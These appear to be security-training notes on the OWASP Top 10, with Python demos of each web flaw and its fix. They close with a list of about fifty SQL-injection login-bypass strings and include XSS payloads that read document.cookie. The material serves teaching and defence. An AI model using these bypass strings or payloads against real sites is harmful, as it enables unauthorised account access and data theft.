- VAPT
- Vulnerability Assessment and Penetration Testing
- VAPT EXPERT = Vulnerability Assessment and Penetration Testing expert
- VULNERABILITY ASSESSMENT is the pre-attack phase, in which the tester scans the target and tries to find the security gaps or holes that make the device or software vulnerable
- Example
- ip address -> 192.168.1.55
- open ports (ports on which some application is listening)
- filtered ports (protected by a firewall, so the scanner gets no answer)
- os information - which OS and version, is it up to date?
- services (and their versions) running on the open ports
- PENETRATION TESTING is the phase in which the tester actually tests the systems by simulating attacks against them
- Penetration testing is a method of evaluating the security of a computer system or network by simulating an attack the way a malicious hacker would. The process involves an active analysis of the system for weaknesses, technical flaws and vulnerabilities. The analysis is carried out from the position of a potential attacker and involves active exploitation of the vulnerabilities found, within the scope the client has agreed to.
- Example: using an exploit for a known vulnerability
- -> a Windows 7 server
- -> using a public exploit against the vulnerable service to exploit the server
- At the end a proof of concept needs to be made and handed to the senior authority (the client's security team)
- Example
- Big banks or smart-car manufacturers hire security professionals to hack into their systems ethically and pay them large sums of money to do so. At the end of the VAPT a VAPT report needs to be handed to the bank's security team
- __________________________________________________
- OWASP -> Open Web Application Security Project
- OWASP Top 10 (2013 edition)
- 1. Injection
- 2. Broken Authentication and Session Management
- 3. Cross Site Scripting (XSS)
- 4. Insecure Direct Object Reference
- 5. Security Misconfiguration
- 6. Sensitive Data Exposure
- 7. Missing Function Level Access Control
- 8. Cross Site Request Forgery
- 9. Using Components with Known Vulnerabilities
- 10. Unvalidated Redirects and Forwards
- 1. Injection vulnerabilities -> SQL, OS commands, LDAP, etc.
- An injection attack occurs when an attacker is able to send malicious, unintended data from the application to an interpreter (the SQL database, the OS shell, etc.) on the backend of the website, so that the data is parsed as part of a query or command instead of being treated as plain data.
- application -> untrusted data -> interpreter (backend)
- Why this attack occurs ->>
- It occurs because of improper validation and, above all, because untrusted input is concatenated straight into the query string. For example, take the sign-in or sign-up form of a web application: when a user signs in or signs up, the form requires the id/password to be entered in a certain format, e.g. no special characters allowed. You will learn how to express such rules as regular expressions.
- Similarly, when a developer is building a web app, he/she needs to validate every parameter, link and domain the site accepts so that commands or special characters do not take effect. Validation alone is not enough: the reliable fix is to hand user input to the interpreter separately from the query, using parameterised (prepared) statements, so the data can never change the structure of the query.
- __________________________________________________________________
- 2. Broken Authentication and Session Management
- In broken authentication or session management, attackers try to take over other users' accounts. They use leaks and flaws in the authentication or session-management functions (login, logout, password reset, remember-me, session ids).
- Why this attack occurs
- -> User credentials are not protected when stored (passwords kept in clear text instead of as salted hashes, or under weak encryption)
- -> Credentials can be guessed or overwritten through weak account-management functions, e.g. the attacker is able to guess a session id, or change another user's password through a weak reset flow
- -> Session ids are exposed in the URL (so they end up in browser history, proxy logs and Referer headers)
- -> Session ids don't time out
- -> Passwords, credentials and session ids are sent in unencrypted form (over plain HTTP)
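The following is an added example, not code from the original notes, showing the fix for the stored-credential and session-id causes listed above: passwords kept as salted PBKDF2 hashes instead of clear text, and session ids that come from the OS random generator, are compared in constant time, and expire. The work factor, the 15-minute timeout and the two user records are assumptions chosen for the demo; only the Python standard library is used.

```python
import hashlib
import hmac
import os
import secrets
import time

PBKDF2_ROUNDS = 100_000   # assumption: work factor for PBKDF2-HMAC-SHA256; raise it on fast hardware
SESSION_TTL = 15 * 60     # assumption: 15 minute idle timeout, in seconds


def hash_password(password: str) -> str:
    """Store 'salt$hash', never the clear-text password (first cause above)."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt.hex() + "$" + digest.hex()


def verify_password(password: str, stored: str) -> bool:
    salt_hex, digest_hex = stored.split("$", 1)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), PBKDF2_ROUNDS)
    # constant-time compare so response timing does not leak how many bytes matched
    return hmac.compare_digest(digest.hex(), digest_hex)


# hash of a random string, used so unknown users cost the same time as wrong passwords
DUMMY_HASH = hash_password(secrets.token_hex(16))


class SessionStore:
    """In-memory session table, session id -> (username, expiry time).

    The clock is injectable so the timeout can be tested without sleeping."""

    def __init__(self, ttl: int = SESSION_TTL, clock=time.time):
        self.ttl = ttl
        self.clock = clock
        self.sessions = {}

    def create(self, username: str) -> str:
        # 32 random bytes from the OS CSPRNG: not guessable and not sequential (second cause above)
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = (username, self.clock() + self.ttl)
        return sid

    def lookup(self, sid: str):
        """Username for a live session, or None if the id is unknown or has timed out (fourth cause)."""
        entry = self.sessions.get(sid)
        if entry is None:
            return None
        username, expiry = entry
        if self.clock() > expiry:
            del self.sessions[sid]
            return None
        # sliding expiry: every valid use pushes the timeout forward
        self.sessions[sid] = (username, self.clock() + self.ttl)
        return username

    def destroy(self, sid: str) -> None:
        """Logout must invalidate the id on the server, not just delete the cookie."""
        self.sessions.pop(sid, None)


def login(users: dict, store: SessionStore, username: str, password: str):
    """users maps username -> 'salt$hash'. Returns a new session id, or None on failure."""
    stored = users.get(username)
    ok = verify_password(password, stored if stored is not None else DUMMY_HASH)
    if stored is None or not ok:
        return None
    return store.create(username)


if __name__ == "__main__":
    users = {"deepak": hash_password("correct horse")}   # constructed account
    store = SessionStore()
    print("wrong password ->", login(users, store, "deepak", "wrong"))
    sid = login(users, store, "deepak", "correct horse")
    print("session", sid, "belongs to", store.lookup(sid))
```

The session id returned by `login()` belongs in a cookie marked HttpOnly and Secure, never in the URL, which covers the remaining two causes in the list.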
- ______________________________________________________________________
- 3. Cross Site Scripting (XSS)
- It is an attack in which the attacker is able to get his/her own JavaScript executed in the context of a web site, in the browsers of that site's users. It is of three types:
- -> Reflected XSS (the payload is in the request and is echoed straight back in the response)
- -> Stored XSS (the payload is saved by the application, e.g. in a comment, and served to every visitor)
- -> DOM-based XSS (the payload never reaches the server; client-side JavaScript writes untrusted data into the page)
- This attack can be used by the attacker to execute JavaScript in the victim's browser to hijack user sessions, deface the website, insert content, redirect the user, etc.
- Why this attack occurs
- -> Improper validation and, more importantly, missing output encoding (untrusted data written into HTML without escaping)
- -> Unsafe JavaScript APIs (innerHTML, document.write, eval) used with untrusted data
- Pentesting of a website can easily detect XSS, and XSS can also be found with simple code analysis; the fix is to escape untrusted data for the context it is written into.
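As an added example (not from the original notes), here is a reflected-XSS "search results" page rendered three ways. The page template, the two payloads and the crude `looks_injected()` oracle are constructed for the demo; the point it shows beyond the text above is that escaping only `<`, `>` and `&` fixes the text context but still leaves the quoted attribute value injectable.

```python
import html

# constructed page template: the same untrusted value lands in two HTML contexts,
# element text (the <p>) and a quoted attribute value (the <input>)
SEARCH_PAGE = '<p>Results for: {q}</p><input name="q" value="{q}">'

TEXT_PAYLOAD = "<script>alert(document.cookie)</script>"
ATTR_PAYLOAD = '" onfocus="alert(document.cookie)" autofocus="'


def render_unsafe(q: str) -> str:
    # BUG: the query string is pasted into the HTML as-is
    return SEARCH_PAGE.format(q=q)


def render_half_fixed(q: str) -> str:
    # escapes < > & but not quotes: enough for the <p>, not for the attribute
    return SEARCH_PAGE.format(q=html.escape(q, quote=False))


def render_safe(q: str) -> str:
    # escapes < > & " ' : the value is inert in both contexts used here
    return SEARCH_PAGE.format(q=html.escape(q, quote=True))


def looks_injected(page: str) -> bool:
    """Crude oracle for this demo: a raw <script> tag, or a quote that closed the
    value attribute and opened an event handler. A browser's parser is the real judge."""
    low = page.lower()
    return "<script" in low or '" onfocus=' in low


if __name__ == "__main__":
    for name, render in (("unsafe", render_unsafe), ("half", render_half_fixed), ("safe", render_safe)):
        for payload in (TEXT_PAYLOAD, ATTR_PAYLOAD):
            print(f"{name:6} injected={looks_injected(render(payload))}  {render(payload)}")
```

`html.escape` is only right for HTML text and quoted attribute values; data written into a `<script>` block, a URL or a CSS value needs the encoder for that context, which is why template engines with context-aware auto-escaping are the practical fix.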
- _______________________________________________________________________________
- 4. Insecure Direct Object Reference
- It is a vulnerability in which an attacker who is authorised only for his/her own dashboard is able to gain access to some other user's account.
- e.g. the application takes an object id straight from the request (www.anywebsite.com/account?id=4) and never checks that the logged-in user owns id 4, so changing the id in the URL shows another user's data
- 5. Security Misconfiguration
- As the name says, security misconfiguration means, for example, a web app that still has admin accounts or default accounts with default passwords, but with certain privileges. If you run a website that has default accounts configured and the website is reachable from the public internet, an attacker can simply try the default credentials and log in to the website.
- Why this attack occurs ->
- -> Keeping default credentials
- -> Using a component or plugin which ships with default credentials
- -> Leaving debug features, sample applications or directory listing enabled on the server
- e.g.
- Directory listing is not disabled on your server. The attacker discovers she can simply list directories to find any file. She finds and downloads all your compiled Java classes, which she decompiles and reverse engineers to get all your custom code. She then finds a serious access-control flaw in your application.
- _______________________________________________________________________
- 6. Sensitive Data Exposure
- Sensitive data exposure is a vulnerability that occurs when an attacker is able to gain access to sensitive data in transit, at rest, or even in the customer's/user's browser
- e.g. 1
- An application encrypts credit card numbers in a database using automatic database encryption. However, this means it also decrypts the data automatically when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear text. The system should have encrypted the credit card numbers using a public key, and only allowed back-end applications to decrypt them with the private key.
- e.g. 2
- A site simply doesn't use SSL/TLS for all authenticated pages. The attacker monitors network traffic (e.g. on an open wireless network) and steals the user's session cookie. The attacker then replays this cookie and hijacks the user's session, accessing the user's private data.
- _____________________________________________________________________________
- 7. Missing Function Level Access Control
- -> It is a flaw in which an attacker, or an anonymous user, is able to access application functionality (a page, URL or API endpoint) that he/she should never have been able to reach, because the server only hides the link in the UI and never checks the user's role when the request arrives.
- e.g. a normal user is given www.anywebsite.com/user
- and the attacker is able to open www.anywebsite.com/admin by simply typing the URL
- if an attacker/person is able to do that, it is a flaw.
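One authorisation layer that addresses both item 4 (Insecure Direct Object Reference) and item 7 (Missing Function Level Access Control) above, written as an added example rather than code from the notes. The `User` records, the `INVOICES` ownership table and the `/user`, `/admin` and `/invoice/<id>` routes are constructed; the object-level check in `get_invoice()` and the role check in `require_role()` are the two things the text says are missing.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    id: int
    role: str  # "user" or "admin"


class Forbidden(Exception):
    """Raised when the request is authenticated but not authorised."""


# constructed data: invoice id -> id of the user who owns it
INVOICES = {101: 1, 102: 2, 103: 2}


def get_invoice_vulnerable(current: User, invoice_id: int) -> int:
    # BUG (IDOR): the id from the URL is used as-is; any logged-in user reads any invoice
    return INVOICES[invoice_id]


def get_invoice(current: User, invoice_id: int) -> int:
    """Object-level check: the reference is still direct, but ownership is verified."""
    owner = INVOICES.get(invoice_id)
    if owner is None:
        raise KeyError(invoice_id)
    if owner != current.id and current.role != "admin":
        raise Forbidden(f"user {current.id} may not read invoice {invoice_id}")
    return owner


def require_role(role: str):
    """Function-level check: runs on every request, whether or not the link was shown in the UI."""
    def decorator(fn):
        def wrapper(current, *args, **kwargs):
            if current is None or current.role != role:
                raise Forbidden(f"{fn.__name__} needs role {role!r}")
            return fn(current, *args, **kwargs)
        return wrapper
    return decorator


@require_role("admin")
def admin_panel(current: User) -> str:
    return "admin panel"


def handle(current, path: str) -> str:
    """Tiny router. /user and /admin exist for everyone; the checks decide who gets served."""
    if current is None:
        raise Forbidden("login required")
    if path == "/user":
        return f"dashboard of user {current.id}"
    if path == "/admin":
        return admin_panel(current)
    if path.startswith("/invoice/"):
        invoice_id = int(path.rsplit("/", 1)[1])
        return f"invoice {invoice_id} owned by user {get_invoice(current, invoice_id)}"
    raise KeyError(path)


def is_allowed(current, path: str) -> bool:
    """True if handle() serves the page, False if it refuses with Forbidden."""
    try:
        handle(current, path)
        return True
    except Forbidden:
        return False


if __name__ == "__main__":
    alice, root = User(1, "user"), User(3, "admin")
    for who, path in ((alice, "/user"), (alice, "/invoice/102"), (alice, "/admin"), (root, "/admin")):
        print(f"user {who.id} {path:13} -> {'allowed' if is_allowed(who, path) else 'forbidden'}")
```

In a real application, answering 404 for both an unknown invoice and someone else's invoice stops an attacker from enumerating which ids exist; the demo keeps the two cases distinct so the check is visible.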
- ____________________________________________________________
- 8. Cross Site Request Forgery
- In this attack the attacker creates a forged HTTP request and tricks the victim into submitting it, via an image tag, a hidden form on the attacker's page, or XSS. The victim's browser attaches the victim's session cookie automatically, so the application treats the forged request as a genuine one.
- The application allows a user to submit a state-changing request that does not include anything secret (no unpredictable token tied to the session).
- For example:
- http://anywebsite.com/app/transferFunds?amount=1500&destinationAccount=4673243243
- This is all done by making the victim click a link, or simply by embedding the URL as the source of an appealing image on a page the victim visits
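The transferFunds endpoint above in two versions, as an added example that is not from the original notes: `transfer_vulnerable()` trusts the session cookie alone, so a forged request carries the victim's authority; `transfer()` requires POST plus a per-session synchronizer token that the attacker's page cannot read. The `Bank` class, its two accounts and the session/cookie model are constructed for the demo.

```python
import hmac
import secrets


class Bank:
    """Constructed toy application: a cookie-based session and a transfer endpoint."""

    def __init__(self):
        self.balances = {"alice": 1000, "attacker": 0}
        self.sessions = {}  # session id (the cookie value) -> {"user": ..., "csrf": ...}

    def login(self, user: str) -> str:
        sid = secrets.token_urlsafe(32)
        # one unpredictable token per session; the app puts it in a hidden field of every form
        self.sessions[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
        return sid

    def csrf_token(self, sid: str) -> str:
        return self.sessions[sid]["csrf"]

    def _move(self, src: str, amount: int, dst: str):
        if amount <= 0 or self.balances.get(src, 0) < amount or dst not in self.balances:
            return (400, "bad transfer")
        self.balances[src] -= amount
        self.balances[dst] += amount
        return (200, f"moved {amount} from {src} to {dst}")

    def transfer_vulnerable(self, sid: str, amount: int, destination: str):
        # BUG: the cookie is the only thing identifying the request, and the browser adds
        # that cookie to any request for this site, including one forged from another site
        session = self.sessions.get(sid)
        if session is None:
            return (401, "not logged in")
        return self._move(session["user"], amount, destination)

    def transfer(self, method: str, sid: str, form: dict):
        if method != "POST":
            return (405, "state-changing requests must use POST")  # no more <img src=...> transfers
        session = self.sessions.get(sid)
        if session is None:
            return (401, "not logged in")
        token = form.get("csrf_token", "")
        # the attacker's page cannot read our form, so it cannot supply this value
        if not hmac.compare_digest(token.encode(), session["csrf"].encode()):
            return (403, "missing or wrong CSRF token")
        return self._move(session["user"], int(form.get("amount", 0)), form.get("destinationAccount", ""))


if __name__ == "__main__":
    bank = Bank()
    alice = bank.login("alice")
    # what <img src="http://anywebsite.com/app/transferFunds?amount=500&destinationAccount=attacker"> does
    print(bank.transfer_vulnerable(alice, 500, "attacker"), bank.balances)
    forged = {"amount": "500", "destinationAccount": "attacker"}
    print(bank.transfer("POST", alice, forged), bank.balances)
    genuine = dict(forged, csrf_token=bank.csrf_token(alice))
    print(bank.transfer("POST", alice, genuine), bank.balances)
```

The token is compared against the one stored for the victim's own session, so a token the attacker obtained from his own account does not help; a SameSite cookie attribute is a second, independent layer on top of this.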
- _______________________________________________________________
- 9. Using Components with Known Vulnerabilities
- In this case the attacker tries to discover a weak component (server software, framework, library, plugin) through scanning or manual analysis, identifies the version in use, and then either uses an exploit that is already publicly available or writes one
- e.g.
- a website running a server version for which a public RCE exploit exists
- or
- a WordPress website which has a vulnerable plugin/theme for which an exploit is available.
- ___________________________________________________________________________________
- 10. Unvalidated Redirects and Forwards
- The attacker links to an unvalidated redirect and tricks the victim into clicking it; the link looks like it belongs to the trusted site but sends the victim to the attacker's site for phishing or malware. The attacker targets unsafe forwards to bypass security checks.
- e.g. http://anywebsite.com/redirect.jsp?url=evil.com
- ->-> the url parameter is taken straight from the request and used as the redirect target, here url=evil.com <-<-
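An added example (not from the original notes) of validating the `url` parameter of the redirect.jsp page above. It goes beyond the single `url=evil.com` case in the text and handles the usual tricks used to slip past a naive "does it contain our domain" check: scheme-relative `//evil.com`, `user@host` confusion, look-alike subdomains, `javascript:` URLs and backslashes. The allowed host names are an assumption for the demo.

```python
from urllib.parse import urlparse

# assumption: the site's own host names; any other host is off-site
ALLOWED_HOSTS = {"anywebsite.com", "www.anywebsite.com"}
DEFAULT = "/"


def redirect_target_unsafe(url_param: str) -> str:
    # BUG: redirect.jsp?url=evil.com sends the user wherever the parameter says
    return url_param


def redirect_target(url_param: str) -> str:
    """Return the parameter if it stays on our site, otherwise DEFAULT."""
    url = (url_param or "").strip()
    if not url:
        return DEFAULT
    # control characters and backslashes: header injection and browser parsing quirks
    if any(c in url for c in "\r\n\t\x00\\"):
        return DEFAULT
    parsed = urlparse(url)
    if parsed.scheme and parsed.scheme not in ("http", "https"):
        return DEFAULT  # javascript:, data:, and oddities such as 'evil.com:80' parsing as a scheme
    if parsed.netloc:
        # absolute URL (or scheme-relative //host): hostname is the part after any user@ prefix, lower-cased
        if parsed.hostname not in ALLOWED_HOSTS:
            return DEFAULT
        return url
    # no host part: accept only a site-absolute path; 'evil.com' alone is not one
    if not url.startswith("/") or url.startswith("//"):
        return DEFAULT
    return url


if __name__ == "__main__":
    for candidate in ("evil.com", "http://evil.com", "//evil.com", "https://anywebsite.com@evil.com/",
                      "https://anywebsite.com.evil.com/", "javascript:alert(1)", "/account/settings",
                      "https://www.anywebsite.com/home"):
        print(f"{candidate!r:42} -> {redirect_target(candidate)!r}")
```

Where the site does not need off-site redirects at all, the simplest design is to accept only a site-absolute path and drop the host-allowlist branch entirely.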
- ______________________________________________________________________________________
- Introduction to DBMS
- Database
- A database is a collection of structured data which contains all the application's data (important credentials, logs, etc.)
- Database Management System - this data needs to be managed, and that is done with the help of a DBMS. The DBMS also interacts with the application/user and writes user data to the database.
- Databases can be of two types
- SQL (relational: data lives in tables with fixed columns and is queried with SQL)
- NoSQL (e.g. document stores such as MongoDB)
- A database has tables, and each table has entries (rows)
- table name Member
- _________________________________________________________
- Name | ID | NUMBER | EMAIL | ADDRESS | Age |
- _________________________________________________________
- deepak|10|9123456719|deepak@yahoo.co.in|lokhandvala|26 |
- Gagan |4 |9145619237|gagan@gmail.com |Delhi |20 |
- _________________________________________________________
- Structured queries would look like this
- for example
- all the people who have age less than 30
- so the query would look like
- SELECT * FROM Member WHERE Age < 30
- H.W. perform all the queries below
- queries
- SELECT - extracts data from a database
- UPDATE - updates data in a database
- DELETE - deletes data from a database
- INSERT INTO - inserts new data into a database
- CREATE DATABASE - creates a new database
- ALTER DATABASE - modifies a database
- CREATE TABLE - creates a new table
- ALTER TABLE - modifies a table (e.g. adds a column)
- DROP TABLE - deletes a table
- SELECT * FROM trainees - select everything from the table named "trainees"
- WHERE - filters the rows, i.e. selects which rows of the table the statement applies to
- H.W. study MongoDB
- SQL vs NoSQL
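As an added worked version of the homework above (not from the original notes), this runs each statement type from the list against the Member table using Python's built-in sqlite3 module, with the two rows from the table re-created in memory. SQLite has no CREATE DATABASE or ALTER DATABASE, since the database is simply the file (here, memory); the other statements are as listed.

```python
import sqlite3

# constructed rows, the same two members as the table in the notes
MEMBERS = [
    ("deepak", 10, "9123456719", "deepak@yahoo.co.in", "lokhandvala", 26),
    ("Gagan", 4, "9145619237", "gagan@gmail.com", "Delhi", 20),
]


def build_db() -> sqlite3.Connection:
    # CREATE TABLE: the database itself is created by opening it (":memory:" = not saved to disk)
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Member ("
        "Name TEXT, ID INTEGER PRIMARY KEY, NUMBER TEXT, EMAIL TEXT, ADDRESS TEXT, Age INTEGER)"
    )
    # INSERT INTO with '?' placeholders: the values travel separately from the SQL text
    conn.executemany(
        "INSERT INTO Member (Name, ID, NUMBER, EMAIL, ADDRESS, Age) VALUES (?, ?, ?, ?, ?, ?)",
        MEMBERS,
    )
    conn.commit()
    return conn


def names_under_age(conn: sqlite3.Connection, limit: int) -> list:
    """SELECT with a WHERE filter, e.g. everyone younger than 30."""
    rows = conn.execute("SELECT Name FROM Member WHERE Age < ? ORDER BY ID", (limit,))
    return [name for (name,) in rows]


def run_homework() -> dict:
    """Runs each remaining statement type from the list and records what it did."""
    conn = build_db()
    out = {}
    out["under_30"] = names_under_age(conn, 30)
    out["under_25"] = names_under_age(conn, 25)
    # UPDATE one row, identified by its primary key
    conn.execute("UPDATE Member SET ADDRESS = ? WHERE ID = ?", ("Mumbai", 10))
    out["deepak_address"] = conn.execute("SELECT ADDRESS FROM Member WHERE ID = 10").fetchone()[0]
    # ALTER TABLE: add a column; PRAGMA table_info lists (cid, name, type, ...) per column
    conn.execute("ALTER TABLE Member ADD COLUMN Joined TEXT")
    out["columns"] = [col[1] for col in conn.execute("PRAGMA table_info(Member)")]
    # DELETE one row
    conn.execute("DELETE FROM Member WHERE ID = ?", (4,))
    out["rows_after_delete"] = conn.execute("SELECT COUNT(*) FROM Member").fetchone()[0]
    # DROP TABLE, then confirm via the catalogue that nothing is left
    conn.execute("DROP TABLE Member")
    out["tables_left"] = [name for (name,) in conn.execute("SELECT name FROM sqlite_master WHERE type = 'table'")]
    conn.close()
    return out


if __name__ == "__main__":
    for key, value in run_homework().items():
        print(f"{key:18} {value}")
```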
- _________________________________
- LVS Setup configuration Practical
- _________________________________
- ______________________________________________
- SQL Injection Authentication Bypass
- What is happening at the time of authentication?
- Let's imagine
- there will be some query -> username == 'Something' AND password == 'Something'
- If we can somehow make the query evaluate to true and confuse the DBMS, will it give us a login?
- for e.g. username = 1' or '1' = '1
- password = 1' or '1' = '1
- or what else can we try
- 0' or '0' = '0
- 2' or '2' = '2
- or
- 0' or '3' = '3
- so basically you just need to manage to make the WHERE clause true, and if there is improper validation (the input is concatenated straight into the query) you get access
- normal login: username = hello, password = hello1
- the query is: ... WHERE username='hello' AND password='hello1' ...
- injected login:
- 1' or '1' = '1
- 1' or '1' = '1
- the query becomes: ... WHERE username='1' or '1' = '1' AND password='1' or '1' = '1' ...
- '1' = '1' is always true, so the WHERE clause matches every row, and the application logs the attacker in as whichever user comes first (usually admin)
- ___________________________________________
- Common authentication-bypass strings to try in the username (and password) field. The trailing --, # and /* start an SQL comment, so the rest of the query (the password check) is ignored; # is MySQL syntax. The ') variants are for queries that wrap the condition in brackets. In the two UNION lines, 81dc9bdb52d04dc20036dbd8313ed055 is the MD5 hash of 1234, so they try to make the query return a forged admin row whose password hash matches 1234.
- or 1=1
- or 1=1--
- or 1=1#
- or 1=1/*
- admin' --
- admin' #
- admin'/*
- admin' or '1'='1
- admin' or '1'='1'--
- admin' or '1'='1'#
- admin' or '1'='1'/*
- admin'or 1=1 or ''='
- admin' or 1=1
- admin' or 1=1--
- admin' or 1=1#
- admin' or 1=1/*
- admin') or ('1'='1
- admin') or ('1'='1'--
- admin') or ('1'='1'#
- admin') or ('1'='1'/*
- admin') or '1'='1
- admin') or '1'='1'--
- admin') or '1'='1'#
- admin') or '1'='1'/*
- 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
- admin" --
- admin" #
- admin"/*
- admin" or "1"="1
- admin" or "1"="1"--
- admin" or "1"="1"#
- admin" or "1"="1"/*
- admin"or 1=1 or ""="
- admin" or 1=1
- admin" or 1=1--
- admin" or 1=1#
- admin" or 1=1/*
- admin") or ("1"="1
- admin") or ("1"="1"--
- admin") or ("1"="1"#
- admin") or ("1"="1"/*
- admin") or "1"="1
- admin") or "1"="1"--
- admin") or "1"="1"#
- admin") or "1"="1"/*
- 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
- ----------------
- GET method (parameters in the URL, visible in history and logs)
- POST method (parameters in the request body)
- www.hisbank.com/transferfundtosunil's_account?amount=500000 (a GET request that changes state, which is what CSRF abuses)
- website.com
- normal login:
- username='something'
- password='something'
- login
- the same login with the bypass string in both fields:
- username='something'
- password='something'
- 1' or '1' = '1
- the resulting query: ... WHERE username='1' or '1' = '1' AND password='1' or '1' = '1' ...
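The login query from this section and the fix promised under item 1 (Injection) above, as an added example that is not code from the original notes. `login_vulnerable()` builds the query by string concatenation exactly as sketched here, so `1' or '1' = '1` and `admin' --` from the list both log in as admin; `login_safe()` sends the same inputs as bound parameters, so they are only ever compared as data. The users table, its two accounts and the use of SQLite via Python's sqlite3 module are constructed for the demo; passwords are stored in clear text here only to keep the injected query readable (see section 2 for how they should be stored).

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # constructed accounts; admin is row 1, which is why the bypass lands on admin
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "s3cret-admin"), ("hello", "hello1")])
    conn.commit()
    return conn


def build_query_vulnerable(username: str, password: str) -> str:
    """The query the notes describe, built by string concatenation: this is the bug."""
    return ("SELECT username FROM users WHERE username='" + username +
            "' AND password='" + password + "'")


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Returns the matched username, or None. The attacker's quotes end the string literal,
    so 'or '1' = '1'' becomes part of the WHERE clause and -- comments out the password check."""
    row = conn.execute(build_query_vulnerable(username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Parameterised query: the values never become part of the SQL text, so a quote in the
    input is just a quote character inside the compared string."""
    row = conn.execute("SELECT username FROM users WHERE username=? AND password=?",
                       (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    for user, pw in (("hello", "hello1"), ("1' or '1' = '1", "1' or '1' = '1"), ("admin' --", "whatever")):
        print(build_query_vulnerable(user, pw))
        print("  vulnerable ->", login_vulnerable(conn, user, pw), "| safe ->", login_safe(conn, user, pw))
```

SQLite treats `--` as a line comment, so `admin' --` works here just as it does in MySQL, while the `#` forms in the list are MySQL-only. Note that the safe version still leaks nothing even when the input contains valid SQL: the check is on query structure, not on filtering characters.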